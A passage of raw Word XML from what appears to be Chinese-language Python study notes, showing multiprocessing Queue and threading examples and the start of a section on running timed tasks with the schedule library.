          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="default"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>queue = manager.Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D8DC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B15061A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3097E21F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCA8E76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC81E7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块访问示例代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4637D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from collections import deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D80C64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from multiprocessing import Queue, Process, Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19602C66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># import queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19941741" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from threading import Thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614CD60E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBCAED3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def Thread_1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708BC963" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9DB05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1412A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def Thread_2():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031B6CBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E26E4ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45292B45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def Process_1(signal_CLEAN_FREEDISK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576DD85F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while signal_CLEAN_FREEDISK.qsize()&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C129A57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print("P1: ", signal_CLEAN_FREEDISK.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B7CFAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A6F20C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def Process_2(signal_CLEAN_FREEDISK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA073CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while signal_CLEAN_FREEDISK.qsize()&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F875737" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print("P2: ", signal_CLEAN_FREEDISK.get())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629A75B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270627C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FB47D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2BDAAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7112B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6BCE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:t>主函数入口</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E906DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # global signal_CLEAN_FREEDISK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9212D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    signal_CLEAN_FREEDISK = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3AB3E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for i in range(50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014AF16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        signal_CLEAN_FREEDISK.put(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748DB6BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1 = Process(target=Process_1, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA818AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2 = Process(target=Process_1, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC75852" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3 = Process(target=Process_2, args=(signal_CLEAN_FREEDISK,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9439E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E0CFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C516FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0F89B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12229529" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_2.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C1068F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    clean_freedisk_flag_process_3.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F256C6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>", signal_CLEAN_FREEDISK.qsize())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD4838" w14:textId="29CB054F" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print("</w:t>
      </w:r>
      <w:r>
        <w:t>完毕</w:t>
      </w:r>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3149F" w14:textId="77777777" w:rsidR="0040078E" w:rsidRDefault="0040078E" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C7BA09" w14:textId="57C91E8B" w:rsidR="0040078E" w:rsidRDefault="0040078E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chat</w:t>
      </w:r>
      <w:r>
        <w:t>GPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的完整代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF5869" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7FACDB" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1718F0" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D247EB1" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def print_numbers():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1CF510" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(1, 6):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF23976" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209324C2" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F5E57E" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F71E366" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D849E" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建一个线程对象，指定运行的函数为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> print_numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60455C97" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    t = threading.Thread(target=print_numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFDF9BA" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D622B7D" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>启动线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B28DD" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB6094" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1944F3BF" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>等待线程执行完毕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547A209" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FD6DD" w14:textId="77777777" w:rsidR="00B44C5D" w:rsidRPr="00C24928" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431577F0" w14:textId="68829A79" w:rsidR="0040078E" w:rsidRPr="0040078E" w:rsidRDefault="00B44C5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C24928">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Thread execution finished")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5C579" w14:textId="77777777" w:rsidR="0040078E" w:rsidRDefault="0040078E" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D887624" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113EB99D" w14:textId="1B545A01" w:rsidR="003452BB" w:rsidRDefault="003452BB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="_Toc159779990"/>
      <w:r>
        <w:t>定时执行任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
    </w:p>
    <w:p w14:paraId="3999D0AA" w14:textId="77777777" w:rsidR="003452BB" w:rsidRDefault="003452BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122F518D" w14:textId="6CFD4EEA" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>chedule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2061A743" w14:textId="5F559C15" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00475134">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python3 -m pip install schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1E360" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1920F3BA" w14:textId="6FB5184F" w:rsidR="00BF2B9A" w:rsidRDefault="00BF2B9A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FCCAA" w14:textId="77777777" w:rsidR="00BF2B9A" w:rsidRDefault="00BF2B9A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF062CA" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AAFC9" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0661AC" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BDDF168" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def job(message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82FF2A" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883ED09" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08295900" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00475134">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>schedule.every(2).hours.do(job, message="It's time!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3548099A" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A5200E" w14:textId="77777777" w:rsidR="007C67C1" w:rsidRPr="00475134" w:rsidRDefault="007C67C1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
